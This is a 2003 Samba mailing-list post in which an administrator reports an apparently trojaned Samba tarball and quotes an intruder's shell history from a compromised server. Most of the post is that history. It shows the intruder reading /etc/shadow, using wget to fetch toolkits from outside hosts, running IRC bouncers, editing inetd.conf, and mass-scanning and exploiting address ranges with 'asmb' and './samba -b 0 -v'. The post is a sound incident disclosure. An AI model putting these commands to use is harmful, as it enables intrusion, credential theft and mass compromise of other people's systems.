[Samba] Faked samba packages / rootkit?

Markus Schabel markus.schabel at tgm.ac.at
Sat Dec 27 20:27:49 GMT 2003


Does anybody know of these samba packages?

http://ftp.cvut.cz/samba/samba-latest.tar.gz

AFAICS they are faked and contain some kind of rootkit (you can see
this in the shell history below: the tarball is fetched into /usr/lib
and built, after which further tools are downloaded into /var/tmp/.nlp
and /tmp/rk. The server this history is from has been taken offline
for security reasons, and nobody is there until 7th Jan, so I can't
give you more details.)

>   144  w
>   145  cat /etc/issue
>   146  uname -a
>   147  cat /etc/shadow
>   148  cd /usr/lib
>   149  wget http://ftp.cvut.cz/samba/samba-latest.tar.gz
>   150  5tar zxvf samba-latest.tar.gz
>   151  tar zxvf samba-latest.tar.gz
>   152  rm -rf samba-latest.tar.gz
>   153  cd samba-3.0.0/
>   154  cd source/
>   155  ./configure
>   156  ./make
>   157  ls
>   158  make
>   159  w
>   160  ls
>   161  cd ..
>   162  cd ..
>   163  cd ..
>   164  cd ..
>   165  ls
>   166  cat /etc/shadows
>   167  cat /etc/shadow
>   168  cat /etc/hosts
>   169  cat /proc/cpuinfo
>   170  socklsit
>   171  sockslist
>   172  w
>   173  killall -9 in.identd
>   174   killall -9 smbd
>   175  killall -9 nmbd
>   176  smbd -D
>   177  nmbd -D
>   178  5 locate in.identd
>   179  locate in.identd
>   180  cd /var/tmp
>   181  ls
>   182  cd .nlp
>   183  wget geocities.com/st3lly/cmd.tg
>   184  wget http://geocities.com/st3lly/cmd.tg
>   185  wget http://geocities.com/st3lly/cmd.tgz
>   186  tar zxvf cmd.tgz
>   187  cd cmd
>   188  ls
>   189  ./stealth 0 193.95.215.54 6666 6668
>   190  ./stealth  193.95.215.54 6666 6668
>   191  ./stealth  193.95.215.54 6667
>   192  w
>   193  cd /var/tmp
>   194  cd .nlp
>   195  wget http://members.xoom.it/pippo46/selena.tgz
>   196  wget http://62.211.66.12/pippo46/selena.tgz
>   197  tar zxvf selena.tgz
>   198  rm selena
>   199  rm selena.tgz
>   200  cd selena/
>   201  ls
>   202  ./assl 212.213
>   203  uname -a
>   204  cd var/tmp/.nlp
>   205  ls
>   206  cd .nlp
>   207  cd /var/tmp
>   208  cd .nlp
>   209  ls
>   210  cd /tmp/
>   211  cd rk
>   212  ls
>   213  wget http://members.xoom.it/vendett/psymag.tar.gz
>   214  wget http://62.211.66.12/vendett/psymag.tar.gz
>   215  tar zxvf psymag.tar.gz
>   216  rm psymag.tar.gz
>   217  cd psybnc
>   218  wget http://62.211.66.12/vendett/psybnc.conf
>   219  ./psybnc
>   220  cd ..
>   221  rm -fr psybnc
>   222  wget http://62.211.66.12/pippo46/asmb.tar
>   223  tar zyvf asmb.tar
>   224  tar zxvf asmb.tar
>   225  rm asmb.tar
>   226  cd w00t/
>   227  ./asmb 120
>   228  ./asmb 110
>   229  ./asmb 217
>   230  ./asmb 217.229
>   231  cat woot.log
>   232  ./samba -b 0 -v 217.229.113.107
>   233  ./asmb 217.46
>   234  ./asmb 217.228
>   235  cd /tmp/rk
>   236  cd w00t/
>   237  ./asmb 194.142
>   238  ./samba -b 0 -v 194.142.156.50
>   239  ./asmb 195.165
>   240  ./asmb 195.240
>   241  ./asmb 195.80
>   242  cat woot.log
>   243  ./samba -b 0 -v 217.229.113.107
>   244  ./samba -b 0 -v 217.229.203.3
>   245  ./samba -b 0 -v 217.229.230.36
>   246  cd /tmp
>   247  ls
>   248  cd rk
>   249  cd w00t/
>   250  cat woot.log
>   251  ./samba -b 0 -v 81.182.126.85
>   252  ./samba -b 0 -v 81.182.126.85
>   253  cat woot.log
>   254  ./samba -b 0 -v 81.182.40.114
>   255  ./samba -b 0 -v 81.209
>   256  ./asmb 81.209
>   257  ./asmb 81.42
>   258  ./asmb 81.248
>   259  w
>   260  cd /var/tmp/.nlp
>   261  ls
>   262  cd ..
>   263  cd rk
>   264  cd /tmp/rk/.nlp
>   265  cd /tmp/
>   266  cd rk
>   267  cd .nlp
>   268  cd w00t/
>   269  ./asmb 195.97
>   270  ./asmb 195.166
>   271  ./asmb 81.183
>   272  cat woot.log
>   273  ./samba -b 0 -v 81.183.0.29
>   274  ./asmb 81.182
>   275  cat woot.log
>   276  ./samba -b 0 -v 81.182.40.114
>   277  ./samba -b 0 -v 81.182.40.114
>   278  ./samba -b 0 -v 81.182.40.114
>   279  ./samba -b 0 -v 81.182.90.152
>   280  cat woot.log
>   281  ./samba -b 0 -v 81.183.0.29
>   282  cat /proc/cpuinfo
>   283  cat /etc/hosts
>   284  w
>   285  cat /etc/issue
>   286  fuser -v 113/tcp
>   287  cat /etc/inetd.conf |grep -i ident
>   288  5vi /etc/inetd.conf
>   289  vi /etc/inetd.conf
>   290  vi /etc/inetd.conf
>   291  5killall -HUP inetd
>   292  killall -HUP inetd
>   293  cd /var/tmp
>   294  ls
>   295  cd /tmp
>   296  ls
>   297  cd rk
>   298  ls
>   299  cd ..
>   300  cd rk
>   301  wget http://members.xoom.it/vendett/psymag.tar.gz
>   302  wget http://62.211.66.12/vendett/psymag.tar.gz
>   303  tar zxvf psymag.tar.gz
>   304  ls
>   305  tar zxf psymag.tar.gz
>   306  tar zxvf psymag.tar.gz
>   307  tar xvfz psymag.tar.gz
>   308  rm psymag.tar.gz
>   309  ls
>   310  cd /usr/lib/.nlp
>   311  cd var/tmp
>   312  cd /var/tmp
>   313  ls
>   314  cd .nlp
>   315  ls
>   316  wget http://members.xoom.it/vendett/psymag.tar.gz
>   317  wget http://62.211.66.12/vendett/psymag.tar.gz
>   318  tar xvfz psymag.tar.gz
>   319  tar -xvfz psymag.tar.gz
>   320  rm psymag.tar.gz
>   321  w
>   322  wget http://62.211.66.12/pippo46/psy.tar.gz
>   323  tar zxvf psy.tar.gz
>   324  rm psy.tar.gz
>   325  wget http://62.211.66.12/pippo46/psyBNC2.3.1.tar
>   326  tar xf psyBNC2.3.1.tar
>   327  ls
>   328  cd psybnc.
>   329  cd psybnc
>   330  ls
>   331  wget http://62.211.66.12/pippo46/psybnc.conf
>   332  ./psybnc
>   333  ls
>   334  menuconf
>   335  ./menuconf
>   336  ./make
>   337  cd menuconf
>   338  ld
>   339  ld
>   340  ls
>   341  cd ..
>   342  ls
>   343  make
>   344  ls
>   345  ./psybnc
>   346  vi psybnc.conf
>   347  ./psybnc
>   348  vi psybnc.conf
>   349  ./psybnc
>   350  vi psybnc.conf
>   351  ./psybnc
>   352  cd ..
>   353  adduser
>   354  cd /tmo/rk/w00t
>   355  cd /tmp/rk/w00t
>   356  ./samba -b 0 -v 193.170.8.129
>   357  cd /tmp/rk/w00t
>   358  ./samba -b 0 -v 211.21.64.204
>   359  ./samba -b 0 -v 211.21.64.204
>   360  ./samba -b 0 -v 128.210.147.242
>   361  cd /tmp/rk/w00t
>   362  ./asmb 128.210
>   363  ./asmb 128.211
>   364  ./asmb 128.209
>   365  ./asmb 128
>   366  ./asmb 210.86
>   367  ./asmb 128
>   368  ./asmb 219
>   369  ./asmb 219.111
>   370  ./asmb 219.166
>   371  cat woot.log
>   372  ./samba -b 0 -v 219.166.79.186
>   373  ./samba -b 0 -v 219.166.81.34
>   374  ./asmb 219.80
>   375  cat woot.log
>   376  ./asmb 219.91
>   377  ./samba -b 0 -v 219.91.104.72
>   378  ./asmb 211.23
>   379  ./asmb 212.54
>   380  ./asmb 212.163
>   381  ./asmb 212.191
>   382  cd ..
>   383  wget xplo.150m.com/allsun.tgz
>   384  tar zxvf allsun.tgz
>   385  tar xf allsun.tgz
>   386  gunzip allsun.tgz
>   387  cd w00t/
>   388  ./asmb 10.12
>   389  ./asmb 212.37
>   390  ./asmb 215
>   391  ./asmb 189
>   392  ./asmb 140
>   393  ./asmb 82.129
>   394  ./asmb 82.39
>   395  cd /tmp/rk
>   396  cd w00t/
>   397  ./samba -b 0 -v 213.81.174.155
>   398  cat woot.log
>   399  cd ..
>   400  ls
>   401  cd w00t/
>   402  ./asmb 213.81
>   403  cd /var/tmp/.nlp
>   404  cd selena/
>   405  ls
>   406  ./ssx
>   407  cd /tmp
>   408  cd rk
>   409  cd w00t/
>   410  ./asmb 210
>   411  ./asmb 210.146
>   412  ./asmb 210.192
>   413  ls
>   414  ./samba -b 0 -v 128.210.147.242
>   415  ./samba -b 0 -v 128.210.147.241
>   416  ./samba -b 0 -v 128.210.147.243
>   417  ./samba -b 0 -v 128.210.147.241
>   418  ./samba -b 0 -v 128.210.147.242
>   419  ./samba -b 0 -v 128.210.147.242
>   420  ./asmb 210.233
>   421  ./samba -b 0 -v 210.233.23.147
>   422  ./asmb 210.59
>   423  ./asmb 211
>   424  ./asmb 211.130
>   425  cat woot.lo
>   426  ./asmb 211.21
>   427  cat woot.log
>   428  ./samba -b 0 -v 211.21.64.204
>   429  ./asmb 211.22
>   430  ./asmb 212
>   431  ./asmb 212.37
>   432  ./asmb 212.101
>   433  ./asmb 212.185
>   434  ./asmb 212.36
>   435  ./asmb 212.80
>   436  ./asmb 214
>   437  ./asmb 158
>   438  ./asmb 02
>   439  ./asmb 82
>   440  ./asmb 82.161
>   441  ./asmb 82.255
>   442  cd /tmp/rk/w00t
>   443  ls
>   444  ./asmb 83
>   445  ./asmb 193.40
>   446  ./asmb 212.28
>   447  ./asmb 172
>   448  ./asmb 172.163
>   449  ./asmb 62.218
>   450  ./asmb 61.189
>   451  ./asmb 63
>   452  ./asmb 62.233
>   453  ./asmb 62.146
>   454  ./asmb 62.140
>   455  ./asmb 62
>   456  ./asmb 62.174
>   457  ./asmb 62.32
>   458  ./asmb 62.57
>   459  ./asmb 62.90
>   460  ./asmb 207.44
>   461  ./asmb 213.64
>   462  ./asmb 213.52
>   463  ./asmb 213.60
>   464  cat woot.log
>   465  ./samba -b 0 -v 213.60.109.1
>   466  ./samba -b 0 -v 213.60.109.1
>   467  wget http://members.xoom.it/pippo46/php.tar
>   468  tar xf php.tar
>   469  ls
>   470  cd php.tar
>   471  cd ..
>   472  cd php.tar
>   473  wget http://members.xoom.it/pippo46/php.tar
>   474  tar xf php.tar
>   475  ls
>   476  wget http://62.211.66.12/pippo46/php.tar
>   477  ./Start 62.162
>   478  ls
>   479  tar xf php.tar
>   480  tar zxvf php.tar
>   481  5http://www.zorgii.0catch.com/phpxpl.tar.gz
>   482  wget http://www.zorgii.0catch.com/phpxpl.tar.gz
>   483  tar zxvf phpxpl.tar.gz
>   484  5gunzip phpxpl.tar.gz
>   485  gunzip phpxpl.tar.gz
>   486  cd w00t/
>   487  ./asmb 213.61
>   488  ./samba -b 0 -v 213.60.109.1
>   489  ./asmb 213.62
>   490  ./asmb 213.58
>   491  ./asmb 213.57
>   492  ./asmb 213.70
>   493  ./asmb 213.80
>   494  ./samba -b 0 -v 81.183.0.29
>   495  w
>   496  cd /var/tmp
>   497  cd /tmp/rk
>   498  cd w00t/
>   499  ./samba -b 0 -v 211.22.94.147
>   500  ./samba -b 0 -v 194.95.226.21


-- 
           \\\ ||| ///                               _\=/_
            (  @ @  )                                (o o)
+--------oOOo-(_)-oOOo--------------------------oOOo-(_)-oOOo------+
| Markus Schabel      TGM - Die Schule der Technik   www.tgm.ac.at |
| IT-Service          A-1200 Wien, Wexstrasse 19-23  net.tgm.ac.at |
| markus.schabel at tgm.ac.at                   Tel.: +43(1)33126/316 |
| markus.schabel at members.fsf.org             Fax.: +43(1)33126/154 |
| FSF Associate Member #597, Linux User #259595 (counter.li.org)   |
|        oOOo        Yet Another Spam Trap:     oOOo               |
|       (    )    oOOo    yast at tgm.ac.at       (   )     oOOo      |
+--------\  (----(   )--------------------------\ ( -----(   )-----+
           \_)     ) /                            \_)      ) /
                  (_/                                     (_/

Computers are like airconditioners:
   They stop working properly if you open windows.


